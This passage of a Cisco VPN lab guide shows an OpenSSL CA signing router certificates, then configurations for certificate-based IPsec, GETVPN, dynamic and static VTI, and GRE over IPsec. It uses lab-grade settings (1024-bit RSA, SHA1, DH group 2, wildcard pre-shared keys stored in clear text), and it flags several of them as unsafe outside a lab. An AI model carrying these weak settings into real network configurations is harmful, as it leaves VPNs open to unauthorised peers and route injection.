                keyid:05:77:AD:69:47:92:05:62:4A:0C:B0:80:09:54:0B:0A:89:2F:FD:C8

Certificate is to be certified until Oct  7 19:05:16 2013 GMT (365 days)
Sign the certificate? [y/n]:y


1 out of 1 certificate requests certified, commit? [y/n]y
Write out database with 1 new entries
Certificate:
    Data:
        Version: 3 (0x2)
        Serial Number: 1 (0x1)
    Signature Algorithm: sha1WithRSAEncryption
        Issuer: C=ES, ST=CAT, L=BCN, O=CAnet, CN=canet.lab.net/emailAddress=root@lab.net
        Validity
            Not Before: Oct  7 19:05:16 2012 GMT
            Not After : Oct  7 19:05:16 2013 GMT
        Subject: C=ES, ST=CAT, O=CAnet, OU=Engineering, CN=router-1.lab.net
        Subject Public Key Info:
            Public Key Algorithm: rsaEncryption
                Public-Key: (1024 bit)
                Modulus:
                    00:c3:24:69:e9:69:df:be:2e:5f:f6:0d:d1:ae:99:
                    82:56:62:70:71:4f:6b:96:c9:29:6a:ff:94:41:86:
                    92:a2:83:20:d6:83:fd:56:10:17:f1:73:dd:88:99:
                    d2:ae:cf:8d:fc:19:7a:0b:5b:ea:fa:49:7c:09:91:
                    eb:33:be:c1:6e:2a:a2:8d:7d:db:79:cc:2f:32:64:
                    27:00:43:35:a1:33:a4:4b:df:a5:10:2a:14:59:5e:
                    af:a4:04:61:a1:0f:24:c8:0c:1c:7c:86:03:84:b8:
                    2f:52:9c:ae:80:09:aa:6f:3e:64:76:63:bd:fc:4c:
                    14:b1:2d:ad:34:e6:85:48:53
                Exponent: 65537 (0x10001)
        X509v3 extensions:
            X509v3 Basic Constraints: 
                CA:FALSE
            Netscape Comment: 
                OpenSSL Generated Certificate
            X509v3 Subject Key Identifier: 
                81:DF:AB:0F:C0:6B:31:4B:08:5E:6D:86:11:26:9C:90:85:F5:83:8F
            X509v3 Authority Key Identifier: 
                keyid:05:77:AD:69:47:92:05:62:4A:0C:B0:80:09:54:0B:0A:89:2F:FD:C8

    Signature Algorithm: sha1WithRSAEncryption
         84:65:11:b5:db:df:f4:ce:d5:3c:d7:a4:d3:10:b8:cc:d5:c5:
         35:c3:7e:95:e6:d2:0b:e2:a9:0e:f6:b4:e7:a4:00:f4:0b:d2:
         04:a3:b1:bc:ba:44:4d:6a:a9:a2:f2:84:ea:5b:70:97:52:46:
         1b:fd:86:74:7f:75:88:50:6e:10:59:c5:20:84:a6:b4:8f:59:
         30:7f:8c:a7:7e:13:60:85:de:5a:a4:8f:ce:05:ba:7c:c6:84:
         fd:10:d0:86:c0:f3:b6:49:02:da:7b:9c:29:c8:8a:d9:7d:c3:
         d1:51:cd:0e:f4:b1:4a:2d:6c:26:16:06:ba:19:c2:79:8e:3f:
         e3:4e
-----BEGIN CERTIFICATE-----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-----END CERTIFICATE-----
Data Base Updated

LINUX-CA# cat router-2.csr
-----BEGIN CERTIFICATE REQUEST-----
MIIB3jCCAUcCAQAwfTEZMBcGA1UEAxMQcm91dGVyLTIubGFiLm5ldDEUMBIGA1UE
CxMLRW5naW5lZXJpbmcxDjAMBgNVBAoTBUNBbmV0MQwwCgYDVQQIEwNDQVQxCzAJ
BgNVBAYTAkVTMR8wHQYJKoZIhvcNAQkCFhByb3V0ZXItMi5sYWIubmV0MIGfMA0G
CSqGSIb3DQEBAQUAA4GNADCBiQKBgQCp+XYSYBFz1iBJEoXSvWjslMSmClPGULuu
VbOnKme8SkWUKbwUUKzP73nSSzMQy1bJqmRaNv2ZKBL/7fmRqUcEKL6mFLaz7i9w
hpUieO65QLEaW1O9skMuwZziwgzR/rbPx+AyZg/3qI6WLKm/NayDZK102fcFuD95
LCYx4AdwPQIDAQABoCEwHwYJKoZIhvcNAQkOMRIwEDAOBgNVHQ8BAf8EBAMCBaAw
DQYJKoZIhvcNAQEEBQADgYEAAmwl6OdFYzRzPmnFgeqC7unXOtpWNwccQs0CTAna
EdKu+dtGB3wEruGciASOTJZGX33Y+p4SmXdNDk50Bvpc8pqMveDuLbDASeeJmQqo
Wzjv6FZ3r+/qf1xJwSXVhsE4K53XOfaoU4Wb+DTyyHskyqU+GkcJujIa7wTNEoHK
Uf8=
-----END CERTIFICATE REQUEST-----
LINUX-CA# openssl ca -in router-2.csr -config /etc/ssl/openssl.cnf
Using configuration from /etc/ssl/openssl.cnf
Enter pass phrase for /etc/ssl/private/cakey.pem:MY_SECRET
Check that the request matches the signature
Signature ok
Certificate Details:
        Serial Number: 2 (0x2)
        Validity
            Not Before: Oct  7 19:06:24 2012 GMT
            Not After : Oct  7 19:06:24 2013 GMT
        Subject:
            countryName               = ES
            stateOrProvinceName       = CAT
            organizationName          = CAnet
            organizationalUnitName    = Engineering
            commonName                = router-2.lab.net
        X509v3 extensions:
            X509v3 Basic Constraints: 
                CA:FALSE
            Netscape Comment: 
                OpenSSL Generated Certificate
            X509v3 Subject Key Identifier: 
                58:C3:3C:F3:1D:8C:D3:02:3A:83:AF:8B:C6:BD:7F:48:B8:54:3A:0A
            X509v3 Authority Key Identifier: 
                keyid:05:77:AD:69:47:92:05:62:4A:0C:B0:80:09:54:0B:0A:89:2F:FD:C8

Certificate is to be certified until Oct  7 19:06:24 2013 GMT (365 days)
Sign the certificate? [y/n]:y


1 out of 1 certificate requests certified, commit? [y/n]y
Write out database with 1 new entries
Certificate:
    Data:
        Version: 3 (0x2)
        Serial Number: 2 (0x2)
    Signature Algorithm: sha1WithRSAEncryption
        Issuer: C=ES, ST=CAT, L=BCN, O=CAnet, CN=canet.lab.net/emailAddress=root@lab.net
        Validity
            Not Before: Oct  7 19:06:24 2012 GMT
            Not After : Oct  7 19:06:24 2013 GMT
        Subject: C=ES, ST=CAT, O=CAnet, OU=Engineering, CN=router-2.lab.net
        Subject Public Key Info:
            Public Key Algorithm: rsaEncryption
                Public-Key: (1024 bit)
                Modulus:
                    00:a9:f9:76:12:60:11:73:d6:20:49:12:85:d2:bd:
                    68:ec:94:c4:a6:0a:53:c6:50:bb:ae:55:b3:a7:2a:
                    67:bc:4a:45:94:29:bc:14:50:ac:cf:ef:79:d2:4b:
                    33:10:cb:56:c9:aa:64:5a:36:fd:99:28:12:ff:ed:
                    f9:91:a9:47:04:28:be:a6:14:b6:b3:ee:2f:70:86:
                    95:22:78:ee:b9:40:b1:1a:5b:53:bd:b2:43:2e:c1:
                    9c:e2:c2:0c:d1:fe:b6:cf:c7:e0:32:66:0f:f7:a8:
                    8e:96:2c:a9:bf:35:ac:83:64:ad:74:d9:f7:05:b8:
                    3f:79:2c:26:31:e0:07:70:3d
                Exponent: 65537 (0x10001)
        X509v3 extensions:
            X509v3 Basic Constraints: 
                CA:FALSE
            Netscape Comment: 
                OpenSSL Generated Certificate
            X509v3 Subject Key Identifier: 
                58:C3:3C:F3:1D:8C:D3:02:3A:83:AF:8B:C6:BD:7F:48:B8:54:3A:0A
            X509v3 Authority Key Identifier: 
                keyid:05:77:AD:69:47:92:05:62:4A:0C:B0:80:09:54:0B:0A:89:2F:FD:C8

    Signature Algorithm: sha1WithRSAEncryption
         55:06:3f:87:2a:2b:a3:a4:e3:c9:c2:26:34:f5:e6:36:d0:52:
         08:41:4b:0c:34:48:b9:9e:2d:b6:ad:33:02:a3:2c:84:78:ed:
         a5:9c:f3:cf:1e:6b:6a:da:58:93:d4:22:25:91:37:44:5b:84:
         76:40:e4:b1:55:94:1d:70:55:ce:06:c3:7e:2d:0f:b7:51:63:
         fc:74:1f:e4:34:4f:38:45:16:8e:bd:fe:36:7b:c0:ba:97:ce:
         97:d5:0e:16:1b:a4:46:e1:a8:3a:5f:77:a7:9b:c4:3c:e5:78:
         58:d4:5f:f5:c6:91:05:5a:b5:2c:93:8b:c1:65:f3:45:6f:0f:
         7f:22
-----BEGIN CERTIFICATE-----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-----END CERTIFICATE-----
Data Base Updated

LINUX-CA# ls -l /etc/ssl/newcerts
total 8
-rw-r--r-- 1 root root 3104 oct  7 21:05 01.pem
-rw-r--r-- 1 root root 3104 oct  7 21:06 02.pem

Importing CA certificate

Before answering "yes" to the fingerprint prompt below, compare the SHA1 fingerprint the router displays with the one computed on the CA host (openssl x509 -noout -fingerprint -sha1 on the CA certificate file); the MD5 line is shown for legacy reasons and should not be used for the comparison. Accepting the prompt makes this CA the trust anchor for IKE authentication on the router. Note also that the lab CA issues 1024-bit RSA keys signed with sha1WithRSAEncryption (see the certificate dump above); that is fine for a lab but below current minimums (2048-bit RSA, SHA-256) for production.

router-1(config)# crypto pki authenticate INCAWETRUST

Enter the base 64 encoded CA certificate.
End with a blank line or the word "quit" on a line by itself

-----BEGIN CERTIFICATE-----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-----END CERTIFICATE-----

Certificate has the following attributes:
       Fingerprint MD5: B81F447E E0E17975 C95F9E27 10EA609E 
      Fingerprint SHA1: B373CB7E BF3CB28A 731A4142 C83C3770 95A8A98B 

% Do you accept this certificate? [yes/no]: yes
Trustpoint CA certificate accepted.
% Certificate successfully imported
router-2(config)# crypto pki authenticate INCAWETRUST

Enter the base 64 encoded CA certificate.
End with a blank line or the word "quit" on a line by itself

-----BEGIN CERTIFICATE-----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-----END CERTIFICATE-----

Certificate has the following attributes:
       Fingerprint MD5: B81F447E E0E17975 C95F9E27 10EA609E 
      Fingerprint SHA1: B373CB7E BF3CB28A 731A4142 C83C3770 95A8A98B 

% Do you accept this certificate? [yes/no]: yes
Trustpoint CA certificate accepted.
% Certificate successfully imported

Importing signed certificate

router-1(config)# crypto pki import INCAWETRUST certificate

Enter the base 64 encoded certificate.
End with a blank line or the word "quit" on a line by itself

-----BEGIN CERTIFICATE-----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-----END CERTIFICATE-----

% Router Certificate successfully imported
router-2(config)# crypto pki import INCAWETRUST certificate

Enter the base 64 encoded certificate.
End with a blank line or the word "quit" on a line by itself

-----BEGIN CERTIFICATE-----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-----END CERTIFICATE-----

% Router Certificate successfully imported

Configuring static crypto maps

Both peers authenticate with the certificates imported above (authentication rsa-sig). The crypto ACLs on the two routers mirror each other, and ACL_NONAT denies the site-to-site traffic before the "permit ip any any" so that it is not translated by PAT before encryption (otherwise it would not match CRYPTO_ACL).

router-1(config)# crypto isakmp policy 1
router-1(config-isakmp)# authentication rsa-sig
router-1(config-isakmp)# encryption aes
router-1(config-isakmp)# hash sha
router-1(config-isakmp)# group 2
router-1(config-isakmp)# lifetime 86400
router-1(config)# crypto isakmp aggressive-mode disable
router-1(config)# crypto isakmp enable
router-1(config)# ip access-list extended CRYPTO_ACL
router-1(config-ext-nacl)# permit ip 192.168.1.0 0.0.0.255 192.168.2.0 0.0.0.255
router-1(config)# crypto ipsec transform-set TRANSFORM_SET esp-aes esp-sha-hmac
router-1(config)# crypto map CRYPTO_MAP 1 ipsec-isakmp
router-1(config-crypto-map)# set peer 12.12.12.2
router-1(config-crypto-map)# match address CRYPTO_ACL
router-1(config-crypto-map)# set transform-set TRANSFORM_SET
router-1(config-crypto-map)# set pfs group2
router-1(config)# interface fa0/0
router-1(config-if)# crypto map CRYPTO_MAP
router-1(config-if)# ip nat outside
router-1(config)# interface fa0/1
router-1(config-if)# ip nat inside
router-1(config)# ip route 192.168.2.0 255.255.255.0 12.12.12.2
router-1(config)# ip access-list extended ACL_NONAT
router-1(config-ext-nacl)# deny ip 192.168.1.0 0.0.0.255 192.168.2.0 0.0.0.255
router-1(config-ext-nacl)# permit ip any any
router-1(config)# ip nat inside source list ACL_NONAT interface fa0/0 overload
router-2(config)# crypto isakmp policy 1
router-2(config-isakmp)# authentication rsa-sig
router-2(config-isakmp)# encryption aes
router-2(config-isakmp)# hash sha
router-2(config-isakmp)# group 2
router-2(config-isakmp)# lifetime 86400
router-2(config)# crypto isakmp aggressive-mode disable
router-2(config)# crypto isakmp enable
router-2(config)# ip access-list extended CRYPTO_ACL
router-2(config-ext-nacl)# permit ip 192.168.2.0 0.0.0.255 192.168.1.0 0.0.0.255
router-2(config)# crypto ipsec transform-set TRANSFORM_SET esp-aes esp-sha-hmac
router-2(config)# crypto map CRYPTO_MAP 1 ipsec-isakmp
router-2(config-crypto-map)# set peer 12.12.12.1
router-2(config-crypto-map)# match address CRYPTO_ACL
router-2(config-crypto-map)# set transform-set TRANSFORM_SET
router-2(config-crypto-map)# set pfs group2
router-2(config)# interface fa0/0
router-2(config-if)# crypto map CRYPTO_MAP
router-2(config-if)# ip nat outside
router-2(config)# interface fa0/1
router-2(config-if)# ip nat inside
router-2(config)# ip route 192.168.1.0 255.255.255.0 12.12.12.1
router-2(config)# ip access-list extended ACL_NONAT
router-2(config-ext-nacl)# deny ip 192.168.2.0 0.0.0.255 192.168.1.0 0.0.0.255
router-2(config-ext-nacl)# permit ip any any
router-2(config)# ip nat inside source list ACL_NONAT interface fa0/0 overload

# Group Encrypted Transport VPN (GETVPN)


Topology

+[ROUTER-0]
|
+[ROUTER-1]----[DEVICE-1]
|
+[ROUTER-2]----[DEVICE-2]
|
+[ROUTER-3]----[DEVICE-3]

[ROUTER-0] fa0/0: 1.2.3.254/24

[ROUTER-1] fa0/0: 1.2.3.1/24
[ROUTER-1] fa0/1: 123.0.1.254/24
[DEVICE-1] fa0/1: 123.0.1.1/24

[ROUTER-2] fa0/0: 1.2.3.2/24
[ROUTER-2] fa0/1: 123.0.2.254/24
[DEVICE-2] fa0/1: 123.0.2.1/24

[ROUTER-3] fa0/0: 1.2.3.3/24
[ROUTER-3] fa0/1: 123.0.3.254/24
[DEVICE-3] fa0/1: 123.0.3.1/24

Note 1: All IP addresses are public (there is no NAT in this topology).
Note 2: Traffic between DEVICE-X and DEVICE-Y is encrypted only on the segment between ROUTER-X and ROUTER-Y.
Note 3: Tunnel mode with header preservation: the outer IPsec header keeps the original source and destination addresses, so the encrypted packets are routed exactly like the clear-text ones.
Note 4: The key server binds its pre-shared key to address 0.0.0.0 0.0.0.0 and every group member uses the same SECRET_KEY, so any host that learns the key can register and obtain the group TEK/KEK. Outside a lab, bind the key to the member addresses or use rsa-sig. "key 0" means the key is entered in clear text and is kept that way in the running configuration unless type 6 key encryption is configured.
Note 5: Rekey messages from the key server are signed with an RSA key; with "rekey transport unicast" configured, a "rekey authentication mypubkey rsa <label>" line (and a matching crypto key pair) is presumably also required for members to accept rekeys -- verify on the target IOS release.

GDOI server

ROUTER-0(config)# crypto isakmp policy 1
ROUTER-0(config-isakmp)# authentication pre-share
ROUTER-0(config-isakmp)# encryption aes
ROUTER-0(config-isakmp)# hash sha
ROUTER-0(config-isakmp)# group 2
ROUTER-0(config-isakmp)# lifetime 86400
ROUTER-0(config)# crypto isakmp aggressive-mode disable
ROUTER-0(config)# crypto isakmp key 0 SECRET_KEY address 0.0.0.0 0.0.0.0
ROUTER-0(config)# crypto isakmp enable
ROUTER-0(config)# crypto ipsec transform-set TRANSFORM_SET esp-aes esp-sha-hmac
ROUTER-0(config)# crypto ipsec profile PROFILE
ROUTER-0(ipsec-profile)# set transform-set TRANSFORM_SET
ROUTER-0(ipsec-profile)# set pfs group2
ROUTER-0(config)# ip access-list extended CRYPTO_ACL
ROUTER-0(config-ext-nacl)# permit ip 123.0.0.0 0.0.255.255 123.0.0.0 0.0.255.255
ROUTER-0(config)# crypto gdoi group GDOI_GROUP
ROUTER-0(config-gdoi-group)# identity number 1
ROUTER-0(config-gdoi-group)# server local
ROUTER-0(gdoi-local-server)# rekey retransmit 10 number 3
ROUTER-0(gdoi-local-server)# rekey transport unicast
ROUTER-0(gdoi-local-server)# sa ipsec 1
ROUTER-0(gdoi-sa-ipsec)# profile PROFILE
ROUTER-0(gdoi-sa-ipsec)# match address ipv4 CRYPTO_ACL
ROUTER-0(gdoi-sa-ipsec)# replay time window-size 5
ROUTER-0(gdoi-local-server)# address ipv4 1.2.3.254

GDOI clients

Same configuration for all GDOI client routers.

ROUTER-1(config)# crypto isakmp policy 1
ROUTER-1(config-isakmp)# authentication pre-share
ROUTER-1(config-isakmp)# encryption aes
ROUTER-1(config-isakmp)# hash sha
ROUTER-1(config-isakmp)# group 2
ROUTER-1(config-isakmp)# lifetime 86400
ROUTER-1(config)# crypto isakmp aggressive-mode disable
ROUTER-1(config)# crypto isakmp key 0 SECRET_KEY address 1.2.3.254
ROUTER-1(config)# crypto isakmp enable
ROUTER-1(config)# crypto gdoi group GDOI_GROUP
ROUTER-1(config-gdoi-group)# identity number 1
ROUTER-1(config-gdoi-group)# server address ipv4 1.2.3.254
ROUTER-1(config)# crypto map CRYPTO_MAP 1 gdoi
ROUTER-1(config-crypto-map)# set group GDOI_GROUP
ROUTER-1(config)# interface fa0/0
ROUTER-1(config-if)# crypto map CRYPTO_MAP
ROUTER-2(config)# crypto isakmp policy 1
ROUTER-2(config-isakmp)# authentication pre-share
ROUTER-2(config-isakmp)# encryption aes
ROUTER-2(config-isakmp)# hash sha
ROUTER-2(config-isakmp)# group 2
ROUTER-2(config-isakmp)# lifetime 86400
ROUTER-2(config)# crypto isakmp aggressive-mode disable
ROUTER-2(config)# crypto isakmp key 0 SECRET_KEY address 1.2.3.254
ROUTER-2(config)# crypto isakmp enable
ROUTER-2(config)# crypto gdoi group GDOI_GROUP
ROUTER-2(config-gdoi-group)# identity number 1
ROUTER-2(config-gdoi-group)# server address ipv4 1.2.3.254
ROUTER-2(config)# crypto map CRYPTO_MAP 1 gdoi
ROUTER-2(config-crypto-map)# set group GDOI_GROUP
ROUTER-2(config)# interface fa0/0
ROUTER-2(config-if)# crypto map CRYPTO_MAP
ROUTER-3(config)# crypto isakmp policy 1
ROUTER-3(config-isakmp)# authentication pre-share
ROUTER-3(config-isakmp)# encryption aes
ROUTER-3(config-isakmp)# hash sha
ROUTER-3(config-isakmp)# group 2
ROUTER-3(config-isakmp)# lifetime 86400
ROUTER-3(config)# crypto isakmp aggressive-mode disable
ROUTER-3(config)# crypto isakmp key 0 SECRET_KEY address 1.2.3.254
ROUTER-3(config)# crypto isakmp enable
ROUTER-3(config)# crypto gdoi group GDOI_GROUP
ROUTER-3(config-gdoi-group)# identity number 1
ROUTER-3(config-gdoi-group)# server address ipv4 1.2.3.254
ROUTER-3(config)# crypto map CRYPTO_MAP 1 gdoi
ROUTER-3(config-crypto-map)# set group GDOI_GROUP
ROUTER-3(config)# interface fa0/0
ROUTER-3(config-if)# crypto map CRYPTO_MAP

# Dynamic and static VTI


Topology

[PC-1]----[ROUTER-1]----[ROUTER-2]----[PC-2]

[PC-1] eth0: 192.168.1.1/24

[ROUTER-1] fa0/1: 192.168.1.254/24
[ROUTER-1] fa0/0: 12.12.12.1/24
[ROUTER-1] vt1: 192.168.0.1/24 (virtual-template1)
[ROUTER-1] lo0: 192.168.0.1/24

[ROUTER-2] lo0: 192.168.0.2/24
[ROUTER-2] tu0: 192.168.0.2/24
[ROUTER-2] fa0/0: 12.12.12.2/24
[ROUTER-2] fa0/1: 192.168.2.254/24

[PC-2] eth0: 192.168.2.1/24

Dynamic VTI (Hub)

The hub cannot initiate a site-to-site VPN because it does not know the peer IP address; the spokes must connect to it. Because the keyring accepts any peer address (pre-shared-key address 0.0.0.0 0.0.0.0) and the ISAKMP profile matches any identity (match identity address 0.0.0.0 0.0.0.0), any host that knows SECRET_KEY can bring up a virtual-access interface on the hub and, since the virtual-template is an active OSPF interface with no authentication shown, inject routes into area 0. Outside a lab, narrow the address ranges or use certificates, and authenticate OSPF on the tunnel interfaces.

ROUTER-1(config)# crypto isakmp policy 1
ROUTER-1(config-isakmp)# authentication pre-share
ROUTER-1(config-isakmp)# encryption aes
ROUTER-1(config-isakmp)# hash sha
ROUTER-1(config-isakmp)# group 2
ROUTER-1(config-isakmp)# lifetime 86400
ROUTER-1(config)# crypto isakmp aggressive-mode disable
ROUTER-1(config)# crypto keyring KEYRING
ROUTER-1(conf-keyring)# pre-shared-key address 0.0.0.0 0.0.0.0 key 0 SECRET_KEY
ROUTER-1(config)# crypto isakmp enable
ROUTER-1(config)# crypto ipsec transform-set TRANSFORM_SET esp-aes esp-sha-hmac
ROUTER-1(config)# crypto isakmp profile PROFILE
ROUTER-1(conf-isa-prof)# match identity address 0.0.0.0 0.0.0.0
ROUTER-1(conf-isa-prof)# keyring KEYRING
ROUTER-1(conf-isa-prof)# virtual-template 1
ROUTER-1(config)# crypto ipsec profile PROFILE
ROUTER-1(config-profile)# set transform-set TRANSFORM_SET
ROUTER-1(config-profile)# set isakmp-profile PROFILE
ROUTER-1(config-profile)# set pfs group2
ROUTER-1(config)# interface lo0
ROUTER-1(config-if)# ip address 192.168.0.1 255.255.255.0
ROUTER-1(config)# interface fa0/0
ROUTER-1(config-if)# ip nat outside
ROUTER-1(config)# interface fa0/1
ROUTER-1(config-if)# ip nat inside
ROUTER-1(config)# interface virtual-template1 type tunnel
ROUTER-1(config-if)# ip unnumbered lo0
ROUTER-1(config-if)# tunnel source fa0/0
ROUTER-1(config-if)# tunnel mode ipsec ipv4
ROUTER-1(config-if)# tunnel protection ipsec profile PROFILE
ROUTER-1(config)# ip route 0.0.0.0 0.0.0.0 12.12.12.2
ROUTER-1(config)# ip access-list extended ACL_NAT
ROUTER-1(config-ext-nacl)# permit ip any any
ROUTER-1(config)# ip nat inside source list ACL_NAT interface fa0/0 overload
ROUTER-1(config)# router ospf 1
ROUTER-1(config-router)# network 192.168.0.0 0.0.255.255 area 0
ROUTER-1(config-router)# passive-interface default
ROUTER-1(config-router)# no passive-interface virtual-template1

Static VTI (Spoke)

The spokes initiate the site-to-site VPN. Unlike the hub, a spoke binds SECRET_KEY to the hub address 12.12.12.1 only, so it will not complete IKE with any other peer.

ROUTER-2(config)# crypto isakmp policy 1
ROUTER-2(config-isakmp)# authentication pre-share
ROUTER-2(config-isakmp)# encryption aes
ROUTER-2(config-isakmp)# hash sha
ROUTER-2(config-isakmp)# group 2
ROUTER-2(config-isakmp)# lifetime 86400
ROUTER-2(config)# crypto isakmp aggressive-mode disable
ROUTER-2(config)# crypto isakmp key 0 SECRET_KEY address 12.12.12.1
ROUTER-2(config)# crypto isakmp enable
ROUTER-2(config)# crypto ipsec transform-set TRANSFORM_SET esp-aes esp-sha-hmac
ROUTER-2(config)# crypto ipsec profile PROFILE
ROUTER-2(ipsec-profile)# set transform-set TRANSFORM_SET
ROUTER-2(ipsec-profile)# set pfs group2
ROUTER-2(config)# interface lo0
ROUTER-2(config-if)# ip address 192.168.0.2 255.255.255.0
ROUTER-2(config)# interface fa0/0
ROUTER-2(config-if)# ip nat outside
ROUTER-2(config)# interface fa0/1
ROUTER-2(config-if)# ip nat inside
ROUTER-2(config)# interface tu0
ROUTER-2(config-if)# ip unnumbered lo0
ROUTER-2(config-if)# tunnel source fa0/0
ROUTER-2(config-if)# tunnel destination 12.12.12.1
ROUTER-2(config-if)# tunnel mode ipsec ipv4
ROUTER-2(config-if)# tunnel protection ipsec profile PROFILE
ROUTER-2(config)# ip route 0.0.0.0 0.0.0.0 12.12.12.1
ROUTER-2(config)# ip access-list extended ACL_NAT
ROUTER-2(config-ext-nacl)# permit ip any any
ROUTER-2(config)# ip nat inside source list ACL_NAT interface fa0/0 overload
ROUTER-2(config)# router ospf 1
ROUTER-2(config-router)# network 192.168.0.0 0.0.255.255 area 0
ROUTER-2(config-router)# passive-interface default
ROUTER-2(config-router)# no passive-interface tu0

# GRE over IPsec


Topology

[PC-1]----[ROUTER-1]----[ROUTER-2]----[PC-2]

[PC-1] eth0: 192.168.1.1/24

[ROUTER-1] fa0/1: 192.168.1.254/24
[ROUTER-1] fa0/0: 12.12.12.1/24
[ROUTER-1] tu0: 12.0.0.1/24

[ROUTER-2] tu0: 12.0.0.2/24
[ROUTER-2] fa0/0: 12.12.12.2/24
[ROUTER-2] fa0/1: 192.168.2.254/24

[PC-2] eth0: 192.168.2.1/24

Using static crypto maps

ROUTER-1(config)# crypto isakmp policy 1
ROUTER-1(config-isakmp)# authentication pre-share
ROUTER-1(config-isakmp)# encryption aes
ROUTER-1(config-isakmp)# hash sha
ROUTER-1(config-isakmp)# group 2
ROUTER-1(config-isakmp)# lifetime 86400
ROUTER-1(config)# crypto isakmp aggressive-mode disable
ROUTER-1(config)# crypto isakmp key 0 SECRET_KEY address 12.12.12.2
ROUTER-1(config)# crypto isakmp enable
ROUTER-1(config)# ip access-list extended CRYPTO_ACL
ROUTER-1(config-ext-nacl)# permit gre host 12.12.12.1 host 12.12.12.2
ROUTER-1(config)# crypto ipsec transform-set TRANSFORM_SET esp-aes esp-sha-hmac
ROUTER-1(config)# crypto map CRYPTO_MAP 1 ipsec-isakmp
ROUTER-1(config-crypto-map)# set peer 12.12.12.2
ROUTER-1(config-crypto-map)# match address CRYPTO_ACL
ROUTER-1(config-crypto-map)# set transform-set TRANSFORM_SET
ROUTER-1(config-crypto-map)# set pfs group2
ROUTER-1(config)# interface fa0/0
ROUTER-1(config-if)# crypto map CRYPTO_MAP
ROUTER-1(config-if)# ip nat outside
ROUTER-1(config)# interface fa0/1
ROUTER-1(config-if)# ip nat inside
ROUTER-1(config)# interface tu0
ROUTER-1(config-if)# ip address 12.0.0.1 255.255.255.0
ROUTER-1(config-if)# tunnel source fa0/0
ROUTER-1(config-if)# tunnel destination 12.12.12.2
ROUTER-1(config)# ip route 192.168.2.0 255.255.255.0 12.0.0.2
ROUTER-1(config)# ip route 0.0.0.0 0.0.0.0 12.12.12.2
ROUTER-1(config)# ip access-list extended ACL_NAT
ROUTER-1(config-ext-nacl)# permit ip any any
ROUTER-1(config)# ip nat inside source list ACL_NAT interface fa0/0 overload
ROUTER-2(config)# crypto isakmp policy 1
ROUTER-2(config-isakmp)# authentication pre-share
ROUTER-2(config-isakmp)# encryption aes
ROUTER-2(config-isakmp)# hash sha
ROUTER-2(config-isakmp)# group 2
ROUTER-2(config-isakmp)# lifetime 86400
ROUTER-2(config)# crypto isakmp aggressive-mode disable
ROUTER-2(config)# crypto isakmp key 0 SECRET_KEY address 12.12.12.1
ROUTER-2(config)# crypto isakmp enable
ROUTER-2(config)# ip access-list extended CRYPTO_ACL
ROUTER-2(config-ext-nacl)# permit gre host 12.12.12.2 host 12.12.12.1
ROUTER-2(config)# crypto ipsec transform-set TRANSFORM_SET esp-aes esp-sha-hmac
ROUTER-2(config)# crypto map CRYPTO_MAP 1 ipsec-isakmp
ROUTER-2(config-crypto-map)# set peer 12.12.12.1
ROUTER-2(config-crypto-map)# match address CRYPTO_ACL
ROUTER-2(config-crypto-map)# set transform-set TRANSFORM_SET
ROUTER-2(config-crypto-map)# set pfs group2
ROUTER-2(config)# interface fa0/0
ROUTER-2(config-if)# crypto map CRYPTO_MAP
ROUTER-2(config-if)# ip nat outside
ROUTER-2(config)# interface fa0/1
ROUTER-2(config-if)# ip nat inside
ROUTER-2(config)# interface tu0
ROUTER-2(config-if)# ip address 12.0.0.2 255.255.255.0
ROUTER-2(config-if)# tunnel source fa0/0
ROUTER-2(config-if)# tunnel destination 12.12.12.1
ROUTER-2(config)# ip route 192.168.1.0 255.255.255.0 12.0.0.1
ROUTER-2(config)# ip route 0.0.0.0 0.0.0.0 12.12.12.1
ROUTER-2(config)# ip access-list extended ACL_NAT
ROUTER-2(config-ext-nacl)# permit ip any any
ROUTER-2(config)# ip nat inside source list ACL_NAT interface fa0/0 overload

Using profiles

ROUTER-1(config)# crypto isakmp policy 1
ROUTER-1(config-isakmp)# authentication pre-share
ROUTER-1(config-isakmp)# encryption aes
ROUTER-1(config-isakmp)# hash sha
ROUTER-1(config-isakmp)# group 2
ROUTER-1(config-isakmp)# lifetime 86400
ROUTER-1(config)# crypto isakmp aggressive-mode disable
ROUTER-1(config)# crypto isakmp key 0 SECRET_KEY address 12.12.12.2
ROUTER-1(config)# crypto isakmp enable
ROUTER-1(config)# crypto ipsec transform-set TRANSFORM_SET esp-aes esp-sha-hmac
ROUTER-1(config)# crypto ipsec profile PROFILE
ROUTER-1(config-profile)# set transform-set TRANSFORM_SET
ROUTER-1(config-profile)# set pfs group2
ROUTER-1(config)# interface fa0/0
ROUTER-1(config-if)# ip nat outside
ROUTER-1(config)# interface fa0/1
ROUTER-1(config-if)# ip nat inside
ROUTER-1(config)# interface tu0
ROUTER-1(config-if)# ip address 12.0.0.1 255.255.255.0
ROUTER-1(config-if)# tunnel source fa0/0
ROUTER-1(config-if)# tunnel destination 12.12.12.2
ROUTER-1(config-if)# tunnel protection ipsec profile PROFILE
ROUTER-1(config)# ip route 192.168.2.0 255.255.255.0 12.0.0.2
ROUTER-1(config)# ip route 0.0.0.0 0.0.0.0 12.12.12.2
ROUTER-1(config)# ip access-list extended ACL_NAT
ROUTER-1(config-ext-nacl)# permit ip any any
ROUTER-1(config)# ip nat inside source list ACL_NAT interface fa0/0 overload
ROUTER-2(config)# crypto isakmp policy 1
ROUTER-2(config-isakmp)# authentication pre-share
ROUTER-2(config-isakmp)# encryption aes
ROUTER-2(config-isakmp)# hash sha
ROUTER-2(config-isakmp)# group 2
ROUTER-2(config-isakmp)# lifetime 86400
ROUTER-2(config)# crypto isakmp aggressive-mode disable
ROUTER-2(config)# crypto isakmp key 0 SECRET_KEY address 12.12.12.1
ROUTER-2(config)# crypto isakmp enable
ROUTER-2(config)# crypto ipsec transform-set TRANSFORM_SET esp-aes esp-sha-hmac
ROUTER-2(config)# crypto ipsec profile PROFILE
ROUTER-2(ipsec-profile)# set transform-set TRANSFORM_SET
ROUTER-2(ipsec-profile)# set pfs group2
ROUTER-2(config)# interface fa0/0
ROUTER-2(config-if)# ip nat outside
ROUTER-2(config)# interface fa0/1
ROUTER-2(config-if)# ip nat inside
ROUTER-2(config)# interface tu0
ROUTER-2(config-if)# ip address 12.0.0.2 255.255.255.0
ROUTER-2(config-if)# tunnel source fa0/0
ROUTER-2(config-if)# tunnel destination 12.12.12.1
ROUTER-2(config-if)# tunnel protection ipsec profile PROFILE
ROUTER-2(config)# ip route 192.168.1.0 255.255.255.0 12.0.0.1
ROUTER-2(config)# ip route 0.0.0.0 0.0.0.0 12.12.12.1
